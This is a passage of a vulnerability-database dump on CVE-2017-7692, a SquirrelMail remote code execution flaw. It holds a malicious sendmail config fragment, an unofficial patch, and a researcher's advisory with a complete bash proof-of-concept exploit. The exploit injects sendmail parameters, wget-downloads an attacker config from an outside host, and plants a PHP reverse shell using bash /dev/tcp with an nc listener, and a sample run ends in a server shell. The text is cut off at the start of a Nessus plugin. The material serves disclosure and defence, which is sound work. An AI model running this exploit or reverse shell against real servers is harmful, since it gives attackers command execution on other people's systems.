\nR$* <@> $: $1 unmark \nR$* ; $1 strip trailing semi \nR$* < $+ :; > $* $@ $2 :; <@> catch <list:;> \nR$* < $* ; > $1 < $2 > bogus bracketed semi \nR$@ $@ :; <@> \nR$* $: < $1 > housekeeping <> \nR$+ < $* > < $2 > strip excess on left \nR< $* > $+ < $1 > strip excess on right \nR<> $@ < @ > MAIL FROM:<> case \nR< $+ > $: $1 remove housekeeping <> \nR@ $+ , $+ $2 \nR@ [ $* ] : $+ $2 \nR@ $+ : $+ $2 \nR $+ : $* ; @ $+ $@ $>Canonify2 $1 : $2 ; < @ $3 > list syntax \nR $+ : $* ; $@ $1 : $2; list syntax \nR$+ @ $+ $: $1 < @ $2 > focus on domain \nR$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze right \nR$+ < @ $+ > $@ $>Canonify2 $1 < @ $2 > already canonical \nR$- ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > resolve uucp names \nR$+ . $- ! $+ $@ $>Canonify2 $3 < @ $1 . $2 > domain uucps \nR$+ ! $+ $@ $>Canonify2 $2 < @ $1 .UUCP > uucp subdomains \nR$* %% $* $1 @ $2 First make them all @s. \nR$* @ $* @ $* $1 %% $2 @ $3 Undo all but the last. \nR$* @ $* $@ $>Canonify2 $1 < @ $2 > Insert < > and finish \nR$* $@ $>Canonify2 $1 \nSCanonify2=96 \nR$* < @ localhost > $* $: $1 < @ $j . 
> $2 no domain at all \nR$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domain \nR$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domain \nR$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [addr] \nR$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literal \nR$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addr \nSfinal=4 \nR$+ :; <@> $@ $1 : handle <list:;> \nR$* <@> $@ handle <> and list:; \nR$* < @ $+ . > $* $1 < @ $2 > $3 \nR$* < @ *LOCAL* > $* $1 < @ $j > $2 \nR$* < $+ > $* $1 $2 $3 defocus \nR@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonical \nR@ $* $@ @ $1 ... and exit \nR$+ @ $- . UUCP $2!$1 u@h.UUCP => h!u \nR$+ %% $=w @ $=w $1 @ $2 u%%host@host => u@host \nSRecurse=97 \nR$* $: $>canonify $1 \nR$* $@ $>parse $1 \nSparse=0 \nR$* $: $>Parse0 $1 initial parsing \nR<@> $#local $: <@> special case error msgs \nR$* $: $>ParseLocal $1 handle local hacks \nR$* $: $>Parse1 $1 final parsing \nSParse0 \nR<@> $@ <@> special case error msgs \nR$* : $* ; <@> $#error $@ 5.1.3 $: \"553 List:; syntax illegal for recipient addresses\" \nR@ <@ $* > < @ $1 > catch \"@@host\" bogosity \nR<@ $+> $#error $@ 5.1.3 $: \"553 User address required\" \nR$+ <@> $#error $@ 5.1.3 $: \"553 Hostname required\" \nR$* $: <> $1 \nR<> $* < @ [ $* ] : $+ > $* $1 < @ [ $2 ] : $3 > $4 \nR<> $* < @ [ $* ] , $+ > $* $1 < @ [ $2 ] , $3 > $4 \nR<> $* < @ [ $* ] $+ > $* $#error $@ 5.1.2 $: \"553 Invalid address\" \nR<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3 \nR<> $* <$* : $* > $* $#error $@ 5.1.3 $: \"553 Colon illegal in host name part\" \nR<> $* $1 \nR$* < @ . $* > $* $#error $@ 5.1.2 $: \"553 Invalid host name\" \nR$* < @ $* .. $* > $* $#error $@ 5.1.2 $: \"553 Invalid host name\" \nR$* < @ $* @ > $* $#error $@ 5.1.2 $: \"553 Invalid route address\" \nR$* @ $* < @ $* > $* $#error $@ 5.1.3 $: \"553 Invalid route address\" \nR$* , $~O $* $#error $@ 5.1.3 $: \"553 Invalid route address\" \nR$* < @ > $* $@ $>Parse0 $>canonify $1 user@ => user \nR< @ $=w . > : $* $@ $>Parse0 $>canonify $2 @here:... 
-> ... \nR$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote \"foo\"@here \nR< @ $+ > $#error $@ 5.1.3 $: \"553 User address required\" \nR$* $=O $* < @ $=w . > $@ $>Parse0 $>canonify $1 $2 $3 ...@here -> ... \nR$- $: $(dequote $1 $) < @ *LOCAL* > dequote \"foo\" \nR< @ *LOCAL* > $#error $@ 5.1.3 $: \"553 User address required\" \nR$* $=O $* < @ *LOCAL* > \n$@ $>Parse0 $>canonify $1 $2 $3 ...@*LOCAL* -> ... \nR$* < @ *LOCAL* > $: $1 \nSParse1 \nR$* < @ [ $+ ] > $* $: $>ParseLocal $1 < @ [ $2 ] > $3 numeric internet spec \nR$* < @ [ $+ ] > $* $: $1 < @ [ $2 ] : $S > $3 Add smart host to path \nR$* < @ [ $+ ] : > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 no smarthost: send \nR$* < @ [ $+ ] : $- : $*> $* $#$3 $@ $4 $: $1 < @ [$2] > $5 smarthost with mailer \nR$* < @ [ $+ ] : $+ > $* $#esmtp $@ $3 $: $1 < @ [$2] > $4 smarthost without mailer \nR$=L < @ $=w . > $#local $: @ $1 special local names \nR$+ < @ $=w . > $#local $: $1 regular local name \nR$* < @ $* > $* $: $>MailerToTriple < $S > $1 < @ $2 > $3 glue on smarthost name \nR$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 user@host.domain \nR$=L $#local $: @ $1 special local names \nR$+ $#local $: $1 regular local names \nSLocal_localaddr \nSlocaladdr=5 \nR$+ $: $1 $| $>\"Local_localaddr\" $1 \nR$+ $| $#ok $@ $1 no change \nR$+ $| $#$* $#$2 \nR$+ $| $* $: $1 \nR$+ + * $#local $@ $&h $: $1 \nR$+ + $* $#local $@ + $2 $: $1 + * \nR$+ $: <> $1 \nR< > $+ $: < > < $1 <> $&h > nope, restore +detail \nR< > < $+ <> + $* > $: < > < $1 + $2 > check whether +detail \nR< > < $+ <> $* > $: < > < $1 > else discard \nR< > < $+ + $* > $* < > < $1 > + $2 $3 find the user part \nR< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra + \nR< > < $+ > $@ $1 no +detail \nR$+ $: $1 <> $&h add +detail back in \nR$+ <> + $* $: $1 + $2 check whether +detail \nR$+ <> $* $: $1 else discard \nR< local : $* > $* $: $>MailerToTriple < local : $1 > $2 no host extension \nR< error : $* > $* $: $>MailerToTriple < error : $1 > $2 no host extension \nR< 
$~[ : $+ > $+ $: $>MailerToTriple < $1 : $2 > $3 < @ $2 > \nR< $+ > $+ $@ $>MailerToTriple < $1 > $2 < @ $1 > \nSParseLocal=98 \nSEnvFromL \nR<@> $n errors to mailer-daemon \nR@ <@ $*> $n temporarily bypass Sun bogosity \nR$+ $: $>AddDomain $1 add local domain if needed \nR$* $: $>MasqEnv $1 do masquerading \nSEnvToL \nR$+ < @ $* > $: $1 strip host part \nR$+ + $* $: < $&{addr_type} > $1 + $2 mark with addr type \nR<e s> $+ + $* $: $1 remove +detail for sender \nR< $* > $+ $: $2 else remove mark \nSHdrFromL \nR<@> $n errors to mailer-daemon \nR@ <@ $*> $n temporarily bypass Sun bogosity \nR$+ $: $>AddDomain $1 add local domain if needed \nR$* $: $>MasqHdr $1 do masquerading \nSHdrToL \nR$+ $: $>AddDomain $1 add local domain if needed \nR$* $: $>MasqHdr $1 do all-masquerading \nSAddDomain \nR$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualified \nR$+ $@ $1 < @ *LOCAL* > add local qualification \nMlocal, P=/bin/bash, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, \nT=DNS/RFC822/X-Unix, \nA=X %s \nMprog, P=/bin/sh, F=lsDFMoqeu9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, D=$z:/, \nT=X-Unix/X-Unix/X-Unix, \nA=sh -c $u \n \n\"\"\" \n \nif __name__ == '__main__': \nmain(sys.argv) \n \nEOF \n \n \n \n \nSOLUTION \n \nSince the vendor did not respond to our mails, no official fix is available. \nHowever, the following unofficial patch can be used to fix this vulnerability. 
\n \nBOF \ndiff -ruN squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php \n--- squirrelmail-webmail-1.4.22/class/deliver/Deliver_SendMail.class.php 2011-01-06 02:44:03.000000000 +0000 \n+++ squirrelmail-webmail-1.4.22-fix-CVE-2017-7692/class/deliver/Deliver_SendMail.class.php 2017-04-18 11:42:26.505181944 +0000 \n@@ -93,9 +93,9 @@ \n$envelopefrom = trim($from->mailbox.'@'.$from->host); \n$envelopefrom = str_replace(array(\"\\0\",\"\\n\"),array('',''),$envelopefrom); \n// save executed command for future reference \n- $this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\"; \n+ $this->sendmail_command = escapeshellcmd(\"$sendmail_path $this->sendmail_args -f\") . escapeshellarg($envelopefrom); \n// open process handle for writing \n- $stream = popen(escapeshellcmd($this->sendmail_command), \"w\"); \n+ $stream = popen($this->sendmail_command, \"w\"); \nreturn $stream; \n} \nEOF \n \n \n \n \nREFERENCES \n \nhttps://squirrelmail.org/ \nhttps://www.wearesegment.com/research/Squirrelmail-Remote-Code-Execution.html \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142212/SGMA17-001.txt"}, {"lastseen": "2017-04-24T17:25:15", "description": "", "published": "2017-04-23T00:00:00", "type": "packetstorm", "title": "SquirrelMail 1.4.22 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10074", "CVE-2016-10045", "CVE-2017-7692", "CVE-2016-10033"], "modified": "2017-04-23T00:00:00", "id": "PACKETSTORM:142266", "href": "https://packetstormsecurity.com/files/142266/SquirrelMail-1.4.22-Remote-Code-Execution.html", "sourceData": "` \n \n__ __ __ __ __ \n/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ \n/ / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/ \n/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \n/_____/\\___/\\__, 
/\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n/____/ \n \n \nFollow @dawid_golunski \n \n \n \n~~~~~~~~~~~~ ExploitBox.io ~~~~~~~~~~~~~~~~ \nInterested in security / vulns / exploits ? \nCheck out the new project of the author of this advisory: \n \nExploitBox.io \nA Playground & Labs for security folks into \nhacking & the art of exploitation \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \n \n \n \n============================================ \n- Author: Dawid Golunski \n- dawid[at]legalhackers.com \n- https://legalhackers.com \n \n- CVE-2017-7692 \n- Release date: 22.04.2017 \n- Revision 1.0 \n- Severity: Critical \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nSquirrelMail <= 1.4.22 Remote Code Execution \n \n \nII. BACKGROUND \n------------------------- \n \n\" \nSquirrelMail is a standards-based webmail package written in PHP. \nIt includes built-in pure PHP support for the IMAP and SMTP protocols, and all \npages render in pure HTML 4.0 (with no JavaScript required) for maximum \ncompatibility across browsers. It has very few requirements and is very easy \nto configure and install. SquirrelMail has all the functionality you would \nwant from an email client, including strong MIME support, address books, and \nfolder manipulation.\" \n \nhttps://squirrelmail.org/about/ \n \nIII. INTRODUCTION \n------------------------- \n \nSquirrelMail is affected by a critical Remote Code Execution vulnerability \nwhich stems from insufficient escaping of user-supplied data when \nSquirrelMail has been configured with Sendmail as the main transport. \nAn authenticated attacker may be able to exploit the vulnerability \nto execute arbitrary commands on the target and compromise the remote \nsystem. \n \nIV. 
DESCRIPTION \n------------------------- \n \nThe vulnerability is similar to the following vulnerabilities previously discovered \nby the author of this advisory: \n \nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html \n \nhttps://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html \n \n \nWhen SquirrelMail has been configured with Sendmail as delivery transport, \nSquirrelMail uses the following function to send out user emails: \n \n-----[ ./class/deliver/Deliver_SendMail.class.php ]----- \n \nfunction initStream($message, $sendmail_path, $ignore=0, $ignore='', $ignore='', $ignore='', $ignore='', $ignore=false, $ignore='') { \n$rfc822_header = $message->rfc822_header; \n$from = $rfc822_header->from[0]; \n$envelopefrom = trim($from->mailbox.'@'.$from->host); \n$envelopefrom = str_replace(array(\"\\0\",\"\\n\"),array('',''),$envelopefrom); \n// save executed command for future reference \n$this->sendmail_command = \"$sendmail_path $this->sendmail_args -f$envelopefrom\"; \n// open process handle for writing \n$stream = popen(escapeshellcmd($this->sendmail_command), \"w\"); \nreturn $stream; \n} \n \n--------------------------------------------------------- \n \n \nSquirrelMail allows authenticated users to control envelopefrom (Return-Path) address \nthrough the webmail web interface. \n \nAs we can see it calls str_replace() to sanitize the user input to prevent \ninjection of additional parameters to the sendmail command. \nUnfortunately it does not take into account \\t (TAB) character which can be \nused by attackers to inject additional parameters. \n \n \nIf attacker sets their email address (Return-Path) in the options to \nattacker@localhost -oQ/tmp/ -X/tmp/sqpoc \n \nand then sends a new email. \nThe sendmail program will be called with the following arguments: \n \nArg no. 0 == [/usr/sbin/sendmail] \nArg no. 1 == [-i] \nArg no. 2 == [-t] \nArg no. 
3 == [-fattacker@localhost] \nArg no. 4 == [-oQ/tmp/] \nArg no. 5 == [-X/tmp/sqpoc] \n \nwhich will result in /tmp/sqpc file created on disk with email log (-X parameter \ncauses sendmail to save the debug/maillog into a file). \n \n \nAs demonstrated by the PoC exploit below, attacker can also inject -Cparameter to \nprovide a malicious sendmail config file which can be uploaded as an attachment to \nachieve arbitrary command execution. \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n \n-----[ SquirrelMail_RCE_exploit.sh ]------ \n \n#!/bin/bash \n# \nint='\\033[94m \n__ __ __ __ __ \n/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ \n/ / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/ \n/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \n/_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n/____/ \n \nSquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) \n \nSquirrelMail_RCE_exploit.sh (ver. 1.0) \n \nDiscovered and coded by \n \nDawid Golunski (@dawid_golunski) \nhttps://legalhackers.com \n \nExploitBox project: \nhttps://ExploitBox.io \n \n\\033[0m' \n \n# Quick and messy PoC for SquirrelMail webmail application. \n# It contains payloads for 2 vectors: \n# * File Write \n# * RCE \n# It requires user credentials and that SquirrelMail uses \n# Sendmail method as email delivery transport \n# \n# \n# Full advisory URL: \n# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html \n# \n# Tested on: # Ubuntu 16.04 \n# squirrelmail package version: \n# 2:1.4.23~svn20120406-2ubuntu1.16.04.1 \n# \n# Disclaimer: \n# For testing purposes only \n# \n# \n# ----------------------------------------------------------------- \n# \n# Interested in vulns/exploitation? \n# Stay tuned for my new project - ExploitBox \n# \n# .;lc' \n# .,cdkkOOOko;. \n# .,lxxkkkkOOOO000Ol' \n# .':oxxxxxkkkkOOOO0000KK0x:' \n# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. 
\n# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. \n# '';ldxxxxxdc,. ,oOXXXNNNXd;,. \n# .ddc;,,:c;. ,c: .cxxc:;:ox: \n# .dxxxxo, ., ,kMMM0:. ., .lxxxxx: \n# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: \n# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: \n# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: \n# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: \n# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: \n# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: \n# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: \n# .dxxxxxdl;. ., .. .;cdxxxxxx: \n# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: \n# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. \n# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. \n# .':oxxxxxxxxx.ckkkkkkkkxl,. \n# .,cdxxxxx.ckkkkkxc. \n# .':odx.ckxl,. \n# .,.'. \n# \n# https://ExploitBox.io \n# \n# https://twitter.com/Exploit_Box \n# \n# ----------------------------------------------------------------- \n \nsqspool=\"/var/spool/squirrelmail/attach/\" \n \necho -e \"$int\" \n#echo -e \"\\033[94m \\nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \\n\" \n#echo -e \"SquirrelMail_RCE_exploit.sh (ver. 1.0)\\n\" \n#echo -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttps://legalhackers.com \\033[0m\\n\\n\" \n \n \n# Base URL \nif [ $# -ne 1 ]; then \necho -e \"Usage: \\n$0 SquirrelMail_URL\" \necho -e \"Example: \\n$0 http://target/squirrelmail/ \\n\" \n \nexit 2 \nfi \nURL=\"$1\" \n \n# Log in \necho -e \"\\n[*] Enter SquirrelMail user credentials\" \nread -p \"user: \" squser \nread -sp \"pass: \" sqpass \n \necho -e \"\\n\\n[*] Logging in to SquirrelMail at $URL\" \ncurl -s -D /tmp/sqdata -d\"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1\" $URL/src/redirect.php | grep -q incorrect \nif [ $? 
-eq 0 ]; then \necho \"Invalid creds\" \nexit 2 \nfi \nsessid=\"`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\" \nkeyid=\"`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`\" \n \n \n# Prepare Sendmail cnf \n# \n# * The config will launch php via the following stanza: \n# \n# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, \n# T=DNS/RFC822/X-Unix, \n# A=php -- $u $h ${client_addr} \n# \nwget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf \n \n# Upload config \necho -e \"\\n\\n[*] Uploading Sendmail config\" \ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/compose.php?mailbox=INBOX&startMessage=1\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\" \nattachid=\"`curl -H \"Expect:\" -s -b\"SQMSESSID=$sessid; key=$keyid\" -F\"smtoken=$token\" -F\"send_to=$mail\" -F\"subject=attach\" -F\"body=test\" -F\"attachfile=@/tmp/smcnf-exp\" -F\"username=$squser\" -F\"attach=Add\" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'\"' '{print $2}' | tr -d '\\n'`\" \nif [ ${#attachid} -lt 32 ]; then \necho \"Something went wrong. Failed to upload the sendmail file.\" \nexit 2 \nfi \n \n# Create Sendmail cmd string according to selected payload \necho -e \"\\n\\n[?] 
Select payload\\n\" \n# SELECT PAYLOAD \necho \"1 - File write (into /tmp/sqpoc)\" \necho \"2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)\" \necho \nread -p \"[1-2] \" pchoice \n \ncase $pchoice in \n1) payload=\"$squser@localhost -oQ/tmp/ -X/tmp/sqpoc\" \n;; \n \n2) payload=\"$squser@localhost -oQ/tmp/ -C$sqspool/$attachid\" \n;; \nesac \n \nif [ $pchoice -eq 2 ]; then \necho \nread -p \"Reverese shell IP: \" reverse_ip \nread -p \"Reverese shell PORT: \" reverse_port \nfi \n \n# Reverse shell code \nphprevsh=\" \n<?php \n\\$cmd = \\\"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\\\"; \nfile_put_contents(\\\"/tmp/cmd\\\", 'export PATH=\\\"\\$PATH\\\" ; export TERM=vt100 ;' . \\$cmd); \nsystem(\\\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\\\"); \n?>\" \n \n \n# Set sendmail params in user settings \necho -e \"\\n[*] Injecting Sendmail command parameters\" \ntoken=\"`curl -s -b\"SQMSESSID=$sessid; key=$keyid\" \"$URL/src/options.php?optpage=personal\" | grep smtoken | awk -F'value=\"' '{print $2}' | cut -d'\"' -f1 `\" \ncurl -s -b\"SQMSESSID=$sessid; key=$keyid\" -d \"smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit\" --data-urlencode \"new_email_address=$payload\" \"$URL/src/options.php?optpage=personal\" | grep -q 'Success' 2>/dev/null \nif [ $? 
-ne 0 ]; then \necho \"Failed to inject sendmail parameters\" \nexit 2 \nfi \n \n# Send email which triggers the RCE vuln and runs phprevsh \necho -e \"\\n[*] Sending the email to trigger the vuln\" \n(sleep 2s && curl -s -D/tmp/sheaders -b\"SQMSESSID=$sessid; key=$keyid\" -d\"smtoken=$token\" -d\"startMessage=1\" -d\"session=0\" \\ \n-d\"send_to=$squser@localhost\" -d\"subject=poc\" --data-urlencode \"body=$phprevsh\" -d\"send=Send\" -d\"username=$squser\" $URL/src/compose.php) & \n \nif [ $pchoice -eq 2 ]; then \necho -e \"\\n[*] Waiting for shell on $reverse_ip port $reverse_port\" \nnc -vv -l -p $reverse_port \nelse \necho -e \"\\n[*] The test file should have been written at /tmp/sqpoc\" \nfi \n \ngrep -q \"302 Found\" /tmp/sheaders \nif [ $? -eq 1 ]; then \necho \"There was a problem with sending email\" \nexit 2 \nfi \n \n \n# Done \necho -e \"\\n[*] All done. Exiting\" \n \n \n \n-------[ EOF ]-------- \n \n \n \nExample run: \n~~~~~~~~~~~~ \n \n$ ./SquirrelMail_RCE_exploit.sh http://xenial/squirrelmail/ \n \n__ __ __ __ __ \n/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ \n/ / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/ \n/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \n/_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n/____/ \n \nSquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) \n \nSquirrelMail_RCE_exploit.sh (ver. 1.0) \n \nDiscovered and coded by \n \nDawid Golunski (@dawid_golunski) \nhttps://legalhackers.com \n \nExploitBox project: \nhttps://ExploitBox.io \n \n \n \n[*] Enter SquirrelMail user credentials \nuser: attacker \npass: \n \n[*] Logging in to SquirrelMail at http://xenial/squirrelmail/ \n \n \n[*] Uploading Sendmail config \n \n \n[?] 
Select payload \n \n1 - File write (into /tmp/sqpoc) \n2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh) \n \n[1-2] 2 \n \nReverese shell IP: 192.168.57.1 \nReverese shell PORT: 1337 \n \n[*] Injecting Sendmail command parameters \n \n[*] Sending the email to trigger the vuln \n \n[*] Waiting for shell on 192.168.57.1 port 1337 \nListening on [0.0.0.0] (family 0, port 1337) \nConnection from [192.168.57.3] port 1337 [tcp/*] accepted (family 2, sport 60608) \nbash: cannot set terminal process group (12208): Inappropriate ioctl for device \nbash: no job control in this shell \nwww-data@vulnsys:/tmp$ id \nid \nuid=33(www-data) gid=33(www-data) groups=33(www-data) \nwww-data@vulnsys:/tmp$ dpkg -l | grep squirrelmail \ndpkg -l | grep squirrelmail \nii squirrelmail 2:1.4.23~svn20120406-2ubuntu1.16.04.1 all Webmail for nuts \nwww-data@vulnsys:/tmp$ exit \nexit \nexit \n \n[*] All done. Exiting \n \n \nVideo PoC: \n~~~~~~~~~~~~ \n \nhttps://legalhackers.com/videos/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html \n \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nA successful exploitation could let remote attackers to gain access to \nthe target server in the context of the web server account which could \nlead to a full compromise of the web application. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nThe latest version of SquirrelMail 1.4.22 and below are affected. \n \nVIII. SOLUTION / VENDOR RESPONSE \n------------------------- \n \nThe vulnerability was first reported to SquirrelMail vendor by the \nauthor of this advisory which resulted in CVE-ID (2017-5181) issued on 4th \nJanuary. The vendor requested more time due to personal issues. \n \nThe vulnerability was however discovered and published in April by another \nresearcher on full-disclosure list which triggered the release \nof this advisory without an official solution available. 
\n \nAs a temporary solution users can switch to SMTP based transport (as \nopposed to Sendmail). \n \nAs advised by MITRE, this vulnerability should now be tracked under the \nnew CVEID - CVE-2017-7692. \n \nVendor has been advised that the isue is now public. No response has been \nreceived yet. \n \nIX. REFERENCES \n------------------------- \n \nhttps://legalhackers.com \n \nhttps://ExploitBox.io \n \nThis / CVE-2017-7692 advisory URL: \nhttps://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html \n \nVideo PoC exploit: \nhttps://legalhackers.com/videos/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html \n \nExploit code: \nThe simple PoC shown above is available here: \nhttps://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh \nhttps://legalhackers.com/exploits/sendmail-exploit.cnf \n \nCVE-2017-7692 \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7692 \n \nVendor site: \nhttps://squirrelmail.org \n \nRelated OSS-SECURITY /full-disclosure messages: \nhttp://seclists.org/fulldisclosure/2017/Apr/89 \nhttp://www.openwall.com/lists/oss-security/2017/04/19/7 \n \n \n \nSimilar vulnerabilities discovered by the author (PHPMailer & SwiftMailer): \n \nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html \nhttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html \nhttps://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html \n \n \nX. CREDITS \n------------------------- \n \nThe vulnerability was first discovered/reported by Dawid Golunski \ndawid (at) legalhackers (dot) com \nhttps://legalhackers.com \n \nFilippo Cavallarin, who also reported the vulnerability at a later date \n(see the oss-security thread referenced below for details) \n \n \nXI. REVISION HISTORY \n------------------------- \n \n22.04.2017 - Advisory released \n \n \nXII. 
LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142266/squirrelmail1422-exec.txt"}], "nessus": [{"lastseen": "2021-01-12T09:44:28", "description": "Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2:1.4.23~svn20120406-2+deb7u1.\n\nWe recommend that you upgrade your squirrelmail packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-16T00:00:00", "title": "Debian DLA-941-1 : squirrelmail security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-05-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:squirrelmail", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-941.NASL", "href": "https://www.tenable.com/plugins/nessus/100176", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-941-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100176);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7692\");\n\n script_name(english:\"Debian DLA-941-1 : squirrelmail security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2:1.4.23~svn20120406-2+deb7u1.\n\nWe recommend that you upgrade your squirrelmail packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
